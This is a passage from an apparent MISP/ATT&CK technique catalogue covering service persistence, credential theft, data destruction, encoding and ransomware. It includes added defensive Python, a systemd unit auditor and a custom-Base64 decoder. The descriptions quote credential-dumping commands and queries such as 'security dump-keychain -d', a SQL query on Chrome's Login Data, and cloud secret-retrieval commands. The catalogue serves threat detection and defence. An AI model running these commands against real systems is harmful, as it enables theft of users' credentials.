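WantedBy=multi-user.target
"""

# Constructed known-good baseline for the same unit, e.g. recorded at deployment time.
SAMPLE_BASELINE = {
    "ExecStartPre": ["-/bin/mkdir -p /dev/shm/.x"],
    "ExecStart": ["/usr/bin/updater --daemon"],
    "ExecReload": ["/bin/kill -HUP $MAINPID"],
}


def parse_unit(text):
    """Parse an INI-like unit into {section: {key: [values...]}}, preserving duplicate keys."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        sections[current].setdefault(key, []).append(value)
    return sections


def exec_path(value):
    """Return the executable of an Exec* value with systemd prefix characters removed."""
    cmd = value.lstrip(EXEC_PREFIXES).strip()
    return cmd.split()[0] if cmd else ""


def audit_unit(text, unit_path=None, baseline=None):
    """Return a list of findings for one .service unit.

    unit_path (optional) enables the symlink check; baseline (optional) maps
    directive -> expected values from a known-good copy, to catch altered commands.
    """
    service = parse_unit(text).get("Service", {})
    findings = []
    for directive in EXEC_DIRECTIVES:
        values = service.get(directive, [])
        for value in values:
            path = exec_path(value)
            if path.startswith(SUSPICIOUS_ROOTS) or "/." in path:
                findings.append(f"{directive} runs from a scratch or hidden path: {path}")
        if baseline is not None and values != baseline.get(directive, []):
            findings.append(f"{directive} differs from baseline: {values}")
    # User= defaults to root for system units; the last occurrence wins.
    runs_as = service.get("User", ["root"])[-1]
    if findings and runs_as == "root":
        findings.append("unit executes as root, so the commands above run fully privileged")
    if unit_path and os.path.islink(unit_path):
        findings.append(f"unit file is a symlink to {os.readlink(unit_path)}")
    return findings


if __name__ == "__main__":
    for finding in audit_unit(SAMPLE_UNIT, baseline=SAMPLE_BASELINE):
        print("-", finding)
```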

The tag is: misp-galaxy:technique="Systemd Service"

Windows Service

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.<sup>[[TechNet Services](https://app.tidalcyber.com/references/b50a3c2e-e997-4af5-8be0-3a8b3a959827)]</sup> Windows service configuration information, including the file path to the service’s executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API.

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: .sys) to disk, the payload can be loaded and registered via [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions such as CreateServiceW() (or manually via functions such as ZwLoadDriver() and ZwSetValueKey()), by creating the required service Registry values (i.e. [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b)), or by using command-line utilities such as PnPUtil.exe.<sup>[[Symantec W.32 Stuxnet Dossier](https://app.tidalcyber.com/references/ef65ab18-fd84-4098-8805-df0268fc3a38)]</sup><sup>[[Crowdstrike DriveSlayer February 2022](https://app.tidalcyber.com/references/4f01e901-58f8-4fdb-ac8c-ef4b6bfd068e)]</sup><sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup> Adversaries may leverage these drivers as [Rootkit](https://app.tidalcyber.com/technique/cf2b56f6-3ebd-48ec-b9d9-835397acef89)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of Exploitation for Privilege Escalation.<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup><sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup>

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://app.tidalcyber.com/technique/68427c7d-f65a-4545-abfd-13d69e5e50cf). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://app.tidalcyber.com/technique/86c2f355-3c97-44c1-9a83-e3d016f50535) (ex: using a service and/or payload name related to a legitimate OS or benign software component).

The tag is: misp-galaxy:technique="Windows Service"

Create or Modify System Process

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.<sup>[[TechNet Services](https://app.tidalcyber.com/references/b50a3c2e-e997-4af5-8be0-3a8b3a959827)]</sup> On macOS, launchd processes known as [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) and [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00) are run to finish system initialization and load user specific parameters.<sup>[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)]</sup>

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.

Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.<sup>[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)]</sup>

The tag is: misp-galaxy:technique="Create or Modify System Process"

Cloud Secrets Management Stores

Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.

Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.

If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://app.tidalcyber.com/technique/3c4a2f3a-5877-4a27-a417-76318523657e) or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as <code>get-secret-value</code> in AWS, <code>gcloud secrets describe</code> in GCP, and <code>az keyvault secret show</code> in Azure.<sup>[[Permiso Scattered Spider 2023](https://app.tidalcyber.com/references/020b97ab-466d-52e6-b1f1-6f9f8ffdabf0)]</sup><sup>[[Sysdig ScarletEel 2.0 2023](https://app.tidalcyber.com/references/285266e7-7a62-5f98-9b0f-fefde4b21c88)]</sup><sup>[[AWS Secrets Manager](https://app.tidalcyber.com/references/ec87e183-3018-5cac-9fab-711003be54f7)]</sup><sup>[[Google Cloud Secrets](https://app.tidalcyber.com/references/4a9e631d-3588-5585-b00a-316a934e6009)]</sup><sup>[[Microsoft Azure Key Vault](https://app.tidalcyber.com/references/8f076aae-38c0-5335-9f7a-1e29b90fc33f)]</sup>

Note: this technique is distinct from [Cloud Instance Metadata API](https://app.tidalcyber.com/technique/a5a95893-d837-424a-979f-095a47dd9f34) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.

The tag is: misp-galaxy:technique="Cloud Secrets Management Stores"

Credentials from Web Browsers

Adversaries may acquire credentials from web browsers by reading files specific to the target browser.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\Local\Google\Chrome\User Data\Default\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victim’s cached logon credentials as the decryption key.<sup>[[Microsoft CryptUnprotectData April 2018](https://app.tidalcyber.com/references/258088ae-96c2-4520-8eb5-1a7e540a9a24)]</sup>

Adversaries have executed similar procedures for common web browsers such as Firefox, Safari, Edge, etc.<sup>[[Proofpoint Vega Credential Stealer May 2018](https://app.tidalcyber.com/references/c52fe62f-4df4-43b0-a126-2df07dc61fc0)]</sup><sup>[[FireEye HawkEye Malware July 2017](https://app.tidalcyber.com/references/7ad228a8-5450-45ec-86fc-ea038f7c6ef7)]</sup> Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://app.tidalcyber.com/technique/9503955c-fa53-452a-b717-7e23bfb4df83).

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.<sup>[[GitHub Mimikittenz July 2016](https://app.tidalcyber.com/references/2e0a95b2-3f9a-4638-9bc5-ff1f3ac2af4b)]</sup>

After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary’s objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).

The tag is: misp-galaxy:technique="Credentials from Web Browsers"

Keychain

Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service.

Keychains can be viewed and edited through the Keychain Access application or using the command-line utility <code>security</code>. Keychain files are located in <code>~/Library/Keychains/</code>, <code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>.<sup>[[Keychain Services Apple](https://app.tidalcyber.com/references/0754f48d-dad8-480c-953c-256be4dfcfc3)]</sup><sup>[[Keychain Decryption Passware](https://app.tidalcyber.com/references/6a426ab4-5b0b-46d4-9dfe-e2587f69e111)]</sup><sup>[[OSX Keychain Schaumann](https://app.tidalcyber.com/references/d0ac448a-7299-4ddc-8730-be72fb840ccb)]</sup>

Adversaries may gather user credentials from Keychain storage/memory. For example, the command <code>security dump-keychain -d</code> will dump all Login Keychain credentials from <code>~/Library/Keychains/login.keychain-db</code>. Adversaries may also directly read Login Keychain credentials from the <code>~/Library/Keychains/login.keychain</code> file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to log in to the macOS host.<sup>[[External to DA, the OS X Way](https://app.tidalcyber.com/references/b714e6a9-5c12-4a3b-89f9-d379c0284f06)]</sup><sup>[[Empire Keychain Decrypt](https://app.tidalcyber.com/references/41075230-73a2-4195-b716-379f9e5ae93b)]</sup>

The tag is: misp-galaxy:technique="Keychain"

Password Managers

Adversaries may acquire user credentials from third-party password managers.<sup>[[ise Password Manager February 2019](https://app.tidalcyber.com/references/253104ab-20b0-43d2-8338-afdd3237cc53)]</sup> Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.<sup>[[ise Password Manager February 2019](https://app.tidalcyber.com/references/253104ab-20b0-43d2-8338-afdd3237cc53)]</sup>

Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.<sup>[[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]</sup><sup>[[Github KeeThief](https://app.tidalcyber.com/references/3b6231fb-5b52-4a3a-a21f-0881901d0037)]</sup> Adversaries may extract credentials from memory via Exploitation for Credential Access.<sup>[[NVD CVE-2019-3610](https://app.tidalcyber.com/references/889b742e-7572-4aad-8944-7f071483b613)]</sup> Adversaries may also try brute forcing via [Password Guessing](https://app.tidalcyber.com/technique/e849ebcc-e0af-45a5-aefa-c394bb759b4e) to obtain the master password of a password manager.<sup>[[Cyberreason Anchor December 2019](https://app.tidalcyber.com/references/a8dc5598-9963-4a1d-a473-bee8d2c72c57)]</sup>

The tag is: misp-galaxy:technique="Password Managers"

Securityd Memory

An adversary who obtains root access (which allows them to read securityd’s memory) can scan through that memory to find the correct sequence of keys in relatively few tries and decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.<sup>[[OS X Keychain](https://app.tidalcyber.com/references/bde3ff9c-fbf9-49c4-b414-70dc8356d57d)]</sup><sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup>

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.<sup>[[OS X Keychain](https://app.tidalcyber.com/references/bde3ff9c-fbf9-49c4-b414-70dc8356d57d)]</sup><sup>[[External to DA, the OS X Way](https://app.tidalcyber.com/references/b714e6a9-5c12-4a3b-89f9-d379c0284f06)]</sup> Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.<sup>[[OS X Keychain](https://app.tidalcyber.com/references/bde3ff9c-fbf9-49c4-b414-70dc8356d57d)]</sup>

The tag is: misp-galaxy:technique="Securityd Memory"

Windows Credential Manager

Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).<sup>[[Microsoft Credential Manager store](https://app.tidalcyber.com/references/c949a29b-bb31-4bd7-a967-ddd48c7efb8e)]</sup><sup>[[Microsoft Credential Locker](https://app.tidalcyber.com/references/77505354-bb08-464c-9176-d0015a62c7c9)]</sup>

The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://app.tidalcyber.com/technique/b4a1cbaa-85d1-4a65-977f-494f66a141e3), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.

Credential Lockers store credentials in encrypted .vcrd files, located under <code>%Systemdrive%\Users\[Username]\AppData\Local\Microsoft\[Vault/Credentials]\</code>. The encryption key can be found in a file named <code>Policy.vpol</code>, typically located in the same folder as the credentials.<sup>[[passcape Windows Vault](https://app.tidalcyber.com/references/a8a56a64-8e73-4331-9961-b1f9b6cbb348)]</sup><sup>[[Malwarebytes The Windows Vault](https://app.tidalcyber.com/references/f09fdc31-38ca-411d-8478-683b08a68535)]</sup>

Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. <code>vaultcmd.exe</code> is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as <code>CredEnumerateA</code>, may also be abused to list credentials managed by the Credential Manager.<sup>[[Microsoft CredEnumerate](https://app.tidalcyber.com/references/ec3e7b3f-99dd-4f2f-885b-09d66b01fe3e)]</sup><sup>[[Delpy Mimikatz Crendential Manager](https://app.tidalcyber.com/references/24c6027b-e0d2-4c0c-83af-4536a631ea85)]</sup>

Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running <code>rundll32.exe keymgr.dll KRShowKeyMgr</code> then selecting the “Back up…” button on the “Stored User Names and Passwords” GUI.

Password recovery tools may also obtain plain text passwords from the Credential Manager.<sup>[[Malwarebytes The Windows Vault](https://app.tidalcyber.com/references/f09fdc31-38ca-411d-8478-683b08a68535)]</sup>

The tag is: misp-galaxy:technique="Windows Credential Manager"

Credentials from Password Stores

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

The tag is: misp-galaxy:technique="Credentials from Password Stores"

Data Destruction

Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://app.tidalcyber.com/technique/761fa7fa-d7e1-4796-85b3-5cd37d55dffa) and [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) because individual files are destroyed rather than sections of a storage disk or the disk’s logical structure.

Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.<sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup> In some cases politically oriented image files have been used to overwrite data.<sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup>

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and SMB/Windows Admin Shares.<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup>

In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.<sup>[[Data Destruction - Threat Post](https://app.tidalcyber.com/references/97d16d3a-98a0-4a7d-9f74-8877c8088ddf)]</sup><sup>[[DOJ - Cisco Insider](https://app.tidalcyber.com/references/b8d9006d-7466-49cf-a70e-384edee530ce)]</sup>

The tag is: misp-galaxy:technique="Data Destruction"

Non-Standard Encoding

Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.<sup>[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)]</sup> <sup>[[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)]</sup>
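An analyst-side decoder for the modified-Base64 case described above. This is an added example, not code from the MISP galaxy or its ATT&CK source; the permuted alphabet and the message body are constructed for illustration, and the alphabet is assumed to have been recovered from the sample beforehand.

```python
"""Decode a Base64 variant that uses a permuted alphabet (added example).

Assumes the custom alphabet has already been recovered from the malware
sample; the alphabet and message body used here are constructed.
"""
import base64
import string
from typing import Dict, Optional

STANDARD_ALPHABET = (
    string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
)

# Constructed: a rotated alphabet of the kind a custom encoder might use.
CUSTOM_ALPHABET = STANDARD_ALPHABET[13:] + STANDARD_ALPHABET[:13]

# Candidate alphabets an analyst might try against an unknown body.
CANDIDATES: Dict[str, str] = {
    "standard": STANDARD_ALPHABET,
    "urlsafe": STANDARD_ALPHABET[:62] + "-_",  # RFC 4648 URL-safe variant
    "rot13-like (constructed)": CUSTOM_ALPHABET,
}


def encode_custom_base64(raw: bytes, alphabet: str) -> str:
    """Encode with a permuted alphabet (used here only to build sample input)."""
    std = base64.b64encode(raw).decode("ascii")
    return std.translate(str.maketrans(STANDARD_ALPHABET, alphabet))


def decode_custom_base64(body: str, alphabet: str) -> bytes:
    """Map the custom alphabet back onto the standard one, then decode.

    Raises ValueError (binascii.Error is a subclass) on a bad alphabet or body.
    """
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must be 64 distinct characters")
    std = body.strip().translate(str.maketrans(alphabet, STANDARD_ALPHABET))
    # Tolerate stripped padding, another common deviation from RFC 4648.
    std += "=" * (-len(std) % 4)
    return base64.b64decode(std, validate=True)


def identify_alphabet(body: str, candidates: Dict[str, str]) -> Optional[str]:
    """Return the first candidate alphabet under which the body decodes to
    printable UTF-8 text, or None if none does.

    A permuted alphabet usually still 'decodes' under the standard one, but to
    garbage bytes, so the plausibility check on the output is what matters.
    """
    for name, alphabet in candidates.items():
        try:
            text = decode_custom_base64(body, alphabet).decode("utf-8")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            continue
        if text.isprintable():
            return name
    return None


if __name__ == "__main__":
    sample = encode_custom_base64(b"GET /beacon id=1337", CUSTOM_ALPHABET)
    print(sample, "->", identify_alphabet(sample, CANDIDATES))
    print(decode_custom_base64(sample, CUSTOM_ALPHABET))
```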

The tag is: misp-galaxy:technique="Non-Standard Encoding"

Standard Encoding

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.<sup>[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)]</sup><sup>[[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)]</sup> Some data encoding systems may also result in data compression, such as gzip.

The tag is: misp-galaxy:technique="Standard Encoding"

Data Encoding

Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.<sup>[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)]</sup> <sup>[[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)]</sup> Some data encoding systems may also result in data compression, such as gzip.

The tag is: misp-galaxy:technique="Data Encoding"

Data Encrypted for Impact

Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.<sup>[[US-CERT Ransomware 2016](https://app.tidalcyber.com/references/866484fa-836d-4c5b-bbad-3594ef60599c)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup><sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup><sup>[[US-CERT SamSam 2018](https://app.tidalcyber.com/references/b9d14fea-2330-4eed-892c-b4e05a35d273)]</sup>

In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://app.tidalcyber.com/technique/cb2e4822-2529-4216-b5b8-75158c5f85ff) or [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418), in order to unlock and/or gain access to manipulate these files.<sup>[[CarbonBlack Conti July 2020](https://app.tidalcyber.com/references/3c3a6dc0-66f2-492e-8c9c-c0bcca73008e)]</sup> In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.<sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup>

To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and SMB/Windows Admin Shares.<sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup><sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup> Encryption malware may also leverage [Internal Defacement](https://app.tidalcyber.com/technique/546a3318-0e03-4b22-95f5-c02ff69a4ebf), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").<sup>[[NHS Digital Egregor Nov 2020](https://app.tidalcyber.com/references/92f74037-2a20-4667-820d-2ccc0e4dbd3d)]</sup>

In cloud environments, storage objects within compromised accounts may also be encrypted.<sup>[[Rhino S3 Ransomware Part 1](https://app.tidalcyber.com/references/bb28711f-186d-4101-b153-6340ce826343)]</sup>

The tag is: misp-galaxy:technique="Data Encrypted for Impact"

Data from Cloud Storage

Adversaries may access data from cloud storage.

Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform.

In some cases, as with IaaS-based cloud storage, there is no overarching application (such as SQL or Elasticsearch) through which to interact with the stored objects: instead, data from these solutions is retrieved directly through the [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through the front-end application or interface (i.e., [Data from Information Repositories](https://app.tidalcyber.com/technique/08a73f37-a04e-46be-9409-b330cbe291b4)).

Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.<sup>[[Amazon S3 Security, 2019](https://app.tidalcyber.com/references/4c434ca5-2544-45e0-82d9-71343d8aa960)]</sup><sup>[[Microsoft Azure Storage Security, 2019](https://app.tidalcyber.com/references/95bda448-bb13-4fa6-b663-e48a9d1b866f)]</sup><sup>[[Google Cloud Storage Best Practices, 2019](https://app.tidalcyber.com/references/752ad355-0f10-4c8d-bad8-42bf2fc75fa0)]</sup> There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.

This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.<sup>[[Trend Micro S3 Exposed PII, 2017](https://app.tidalcyber.com/references/1ba37b48-1219-4f87-af36-9bdd8d6265ca)]</sup><sup>[[Wired Magecart S3 Buckets, 2019](https://app.tidalcyber.com/references/47fb06ed-b4ce-454c-9bbe-21b28309f351)]</sup><sup>[[HIPAA Journal S3 Breach, 2017](https://app.tidalcyber.com/references/b0fbf593-4aeb-4167-814b-ed3d4479ded0)]</sup><sup>[[Rclone-mega-extortion_05_2021](https://app.tidalcyber.com/references/9b492a2f-1326-4733-9c0e-a9454bf7fabb)]</sup>

Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.

The tag is: misp-galaxy:technique="Data from Cloud Storage"

Network Device Configuration Dump

Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after a device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or legitimate accounts and credentials for later use.

Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.<sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup> These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.

The tag is: misp-galaxy:technique="Network Device Configuration Dump"

SNMP (MIB Dump)

Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).

